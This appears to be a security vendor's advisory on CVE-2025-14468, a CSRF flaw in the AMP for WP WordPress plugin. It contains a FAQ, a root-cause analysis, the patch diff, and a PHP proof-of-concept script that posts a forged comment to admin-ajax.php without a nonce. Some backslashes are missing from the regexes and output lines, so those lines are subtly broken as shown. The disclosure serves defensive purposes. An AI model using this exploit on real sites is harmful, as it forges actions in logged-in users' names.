What is CVE-2025-14468?

CVE-2025-14468 is a Cross-Site Request Forgery (CSRF) vulnerability in the AMP for WP – Accelerated Mobile Pages plugin for WordPress, affecting versions up to and including 1.1.9. This flaw allows unauthenticated attackers to submit comments on behalf of logged-in users due to incorrect nonce verification logic in the plugin’s AJAX handler.

How does the vulnerability work?

The vulnerability arises from an inverted nonce verification logic in the `amp_theme_ajaxcomments` AJAX handler. Valid nonces are incorrectly rejected, while requests with missing or invalid nonces are accepted, allowing attackers to submit comments by tricking logged-in users into clicking a malicious link.

Who is affected by this vulnerability?

WordPress sites using the AMP for WP plugin version 1.1.9 or earlier are affected. Site administrators and users with roles that can comment are particularly at risk, as the vulnerability allows attackers to submit comments under their identity.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the AMP for WP plugin installed. If the version is 1.1.9 or earlier, your site is at risk. You can find the version in the WordPress admin dashboard under Plugins.

How can I fix this vulnerability?

The vulnerability is fixed in version 1.1.10 of the AMP for WP plugin. Updating to this version or later will mitigate the risk. Always ensure that plugins are kept up to date to protect against known vulnerabilities.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for direct privilege escalation or remote code execution, it can still lead to unauthorized actions, such as spam comments, which can undermine site integrity.

What practical risks does this vulnerability pose?

Exploitation of this vulnerability can lead to unauthorized comment submissions, which may include spam or malicious links. While it does not allow for full site compromise, it can damage the site’s reputation and trustworthiness among users.

What is the proof of concept for this vulnerability?

The proof of concept illustrates how an attacker can submit a comment by sending a crafted POST request to the WordPress AJAX endpoint without a valid nonce. This demonstrates the ease with which the vulnerability can be exploited if a logged-in user interacts with a malicious link.

What steps can I take to mitigate the risk?

In addition to updating the plugin, consider implementing security measures such as using a web application firewall, monitoring comment submissions, and educating users about the risks of clicking unknown links. Regular security audits can also help identify vulnerabilities.

Is it safe to continue using the plugin after updating?

After updating to version 1.1.10 or later, the vulnerability is resolved. However, continue to monitor for any future vulnerabilities and keep the plugin updated to ensure ongoing security. Regularly review security practices to maintain a secure WordPress environment.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14468: AMP for WP – Accelerated Mobile Pages <= 1.1.9 – Cross-Site Request Forgery to Comment Submission (accelerated-mobile-pages)

CVE ID CVE-2025-14468

Plugin accelerated-mobile-pages

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 1.1.9

Patched Version 1.1.10

Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14468:
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the AMP for WP WordPress plugin, affecting versions up to and including 1.1.9. The flaw resides in the plugin’s AJAX comment submission handler, which incorrectly validates security nonces. This allows unauthenticated attackers to force logged-in users to submit comments without their consent when the plugin’s template mode is active. The CVSS score of 4.3 reflects a medium-severity impact.

The root cause is an inverted nonce verification logic within the `amp_theme_ajaxcomments` AJAX handler. The vulnerable code is located in the file `accelerated-mobile-pages/templates/template-mode/template-mode.php`. In the patched diff, line 116 shows the critical change. The original code performed a standard check: `if(wp_verify_nonce($_POST[‘amp_comment_form_nonce’], ‘commentform_submission’))`. This condition would evaluate to true for a valid nonce, causing the script to execute the `die` statement and reject the request. The logic flaw meant requests with valid nonces were blocked, while requests with missing or invalid nonces were processed.

Exploitation requires the attacker to craft a malicious web page or link that submits a forged POST request to the WordPress site’s admin-ajax.php endpoint. The request must specify the `action` parameter as `amp_theme_ajaxcomments` and include the necessary comment data (e.g., `comment`, `comment_post_ID`). Crucially, the request must either omit the `amp_comment_form_nonce` parameter or provide an invalid value. When a logged-in WordPress administrator or author visits the attacker’s page, their browser automatically submits this request with their session cookies, resulting in an unauthorized comment submission.

The patch, applied in version 1.1.10, corrects the logic by adding a negation operator (`!`) to the nonce verification condition. The corrected line reads: `if( ! wp_verify_nonce($_POST[‘amp_comment_form_nonce’], ‘commentform_submission’) )`. This change ensures the script only terminates and returns a ‘Nonce not verified’ error when the nonce verification fails. Requests with a valid nonce now proceed normally, while requests with a missing or invalid nonce are correctly rejected, restoring proper CSRF protection.

Successful exploitation allows an attacker to submit arbitrary comments under the identity of a logged-in user. This can lead to spam, defacement, or the injection of malicious links into the site’s comment section. While the impact is limited to comment submission and does not directly enable privilege escalation or remote code execution, it undermines site integrity and trust. The attack requires user interaction and the plugin’s template mode to be enabled, which moderates the overall risk.

Differential between vulnerable and patched code

Code Diff

--- a/accelerated-mobile-pages/accelerated-moblie-pages.php
+++ b/accelerated-mobile-pages/accelerated-moblie-pages.php
@@ -3,7 +3,7 @@
 Plugin Name: Accelerated Mobile Pages
 Plugin URI: https://wordpress.org/plugins/accelerated-mobile-pages/
 Description: AMP for WP - Accelerated Mobile Pages for WordPress
-Version: 1.1.9
+Version: 1.1.10
 Author: Ahmed Kaludi, Mohammed Kaludi
 Author URI: https://ampforwp.com/
 Donate link: https://www.paypal.me/Kaludi/25
@@ -20,7 +20,7 @@
 define('AMPFORWP_DISQUS_URL',plugin_dir_url(__FILE__).'includes/disqus.html');
 define('AMPFORWP_IMAGE_DIR',plugin_dir_url(__FILE__).'images');
 define('AMPFORWP_MAIN_PLUGIN_DIR', plugin_dir_path( __DIR__ ) );
-define('AMPFORWP_VERSION','1.1.9');
+define('AMPFORWP_VERSION','1.1.10');
 define('AMPFORWP_EXTENSION_DIR',plugin_dir_path(__FILE__).'includes/options/extensions');
 define('AMPFORWP_ANALYTICS_URL',plugin_dir_url(__FILE__).'includes/features/analytics');
 if(!defined('AMPFROWP_HOST_NAME')){
@@ -1661,4 +1661,3 @@
 	}

 }
-
--- a/accelerated-mobile-pages/templates/features.php
+++ b/accelerated-mobile-pages/templates/features.php
@@ -288,7 +288,7 @@
 		if ( is_category_amp_disabled() ) {
 			return;
 		}
-      	if ( is_page() && ! ampforwp_get_setting('amp-on-off-for-all-pages') && ! is_home() && ! is_front_page() ) {
+      	if ( is_page() && false == ampforwp_get_setting('amp-on-off-for-all-pages') && ! is_home() && ! is_front_page() ) {
 			return;
 		}
 		if ( is_home() && ! ampforwp_is_blog() && !ampforwp_get_setting('ampforwp-homepage-on-off-support') ) {
@@ -7996,7 +7996,7 @@
 	$rel_attributes = array_map('esc_attr', $rel_attributes);
 	if ( $rel_attributes ) {
 		/* phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped */
-		echo 'rel="' . implode(" ",$rel_attributes).'"';
+		echo 'rel="' . implode(" ",$rel_attributes).'" ';
 	}
 	return;
 }
@@ -8815,7 +8815,8 @@

 	if(preg_match('/<a(.*?)slabels(.*?)>/', $content)){
 		$content = preg_replace_callback('/<ab[^>]*>/i', function ($matches) {
-			return preg_replace('/s*labels*=s*"[^"]*"/i', '', $matches[0]);
+			// Only match standalone 'label' attribute, not 'aria-label' or other attributes containing 'label'
+			return preg_replace('/(?<!aria-)blabels*=s*"[^"]*"/i', '', $matches[0]);
 		}, $content);
 	}
 	return $content;
--- a/accelerated-mobile-pages/templates/template-mode/template-mode.php
+++ b/accelerated-mobile-pages/templates/template-mode/template-mode.php
@@ -116,7 +116,7 @@
 		  header("access-control-expose-headers:AMP-Access-Control-Allow-Source-Origin");
 		  header("Content-Type:application/json;charset=utf-8");
 		  /* phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotValidated,WordPress.Security.ValidatedSanitizedInput.MissingUnslash,WordPress.Security.ValidatedSanitizedInput.InputNotSanitized */
-		  if(wp_verify_nonce($_POST['amp_comment_form_nonce'], 'commentform_submission')){
+		  if( ! wp_verify_nonce($_POST['amp_comment_form_nonce'], 'commentform_submission') ){
 			$comment_status = array('response' => 'Nonce not verified' );
 			echo wp_json_encode($comment_status);
 			die;

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14468 - AMP for WP – Accelerated Mobile Pages <= 1.1.9 - Cross-Site Request Forgery to Comment Submission

<?php
// Configuration: Set the target WordPress site URL.
$target_url = 'https://vulnerable-site.example.com';

// The AJAX endpoint for WordPress.
$ajax_endpoint = $target_url . '/wp-admin/admin-ajax.php';

// The vulnerable AJAX action hook.
$action = 'amp_theme_ajaxcomments';

// Sample comment data. Adjust the post ID and comment content as needed.
$post_data = array(
    'action' => $action,
    'comment' => 'Injected comment via CSRF by Atomic Edge research.',
    'comment_post_ID' => '1', // The ID of the post to comment on.
    // The exploit works by OMITTING or providing an INVALID nonce.
    // 'amp_comment_form_nonce' => 'invalid_nonce_here',
);

// Initialize cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// For demonstration, we are not sending cookies. In a real attack, the victim's browser would send their session cookies.
// curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=...');

// Execute the request.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output the result.
echo "Target: " . $target_url . "n";
echo "HTTP Status: " . $http_code . "n";
echo "Response: " . $response . "n";

// If the response contains 'Nonce not verified', the site is likely patched.
// If the response is a JSON success message, the site is vulnerable.
?>

Frequently Asked Questions

What is CVE-2025-14468?
Understanding the vulnerability
CVE-2025-14468 is a Cross-Site Request Forgery (CSRF) vulnerability in the AMP for WP – Accelerated Mobile Pages plugin for WordPress, affecting versions up to and including 1.1.9. This flaw allows unauthenticated attackers to submit comments on behalf of logged-in users due to incorrect nonce verification logic in the plugin’s AJAX handler.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability arises from an inverted nonce verification logic in the `amp_theme_ajaxcomments` AJAX handler. Valid nonces are incorrectly rejected, while requests with missing or invalid nonces are accepted, allowing attackers to submit comments by tricking logged-in users into clicking a malicious link.
Who is affected by this vulnerability?
Identifying vulnerable users
WordPress sites using the AMP for WP plugin version 1.1.9 or earlier are affected. Site administrators and users with roles that can comment are particularly at risk, as the vulnerability allows attackers to submit comments under their identity.
How can I check if my site is vulnerable?
Assessing your plugin version
To determine if your site is vulnerable, check the version of the AMP for WP plugin installed. If the version is 1.1.9 or earlier, your site is at risk. You can find the version in the WordPress admin dashboard under Plugins.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is fixed in version 1.1.10 of the AMP for WP plugin. Updating to this version or later will mitigate the risk. Always ensure that plugins are kept up to date to protect against known vulnerabilities.
What does the CVSS score of 4.3 mean?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for direct privilege escalation or remote code execution, it can still lead to unauthorized actions, such as spam comments, which can undermine site integrity.
What practical risks does this vulnerability pose?
Potential impacts on your site
Exploitation of this vulnerability can lead to unauthorized comment submissions, which may include spam or malicious links. While it does not allow for full site compromise, it can damage the site’s reputation and trustworthiness among users.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept illustrates how an attacker can submit a comment by sending a crafted POST request to the WordPress AJAX endpoint without a valid nonce. This demonstrates the ease with which the vulnerability can be exploited if a logged-in user interacts with a malicious link.
What steps can I take to mitigate the risk?
Best practices for security
In addition to updating the plugin, consider implementing security measures such as using a web application firewall, monitoring comment submissions, and educating users about the risks of clicking unknown links. Regular security audits can also help identify vulnerabilities.
Is it safe to continue using the plugin after updating?
Post-update considerations
After updating to version 1.1.10 or later, the vulnerability is resolved. However, continue to monitor for any future vulnerabilities and keep the plugin updated to ensure ongoing security. Regularly review security practices to maintain a secure WordPress environment.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations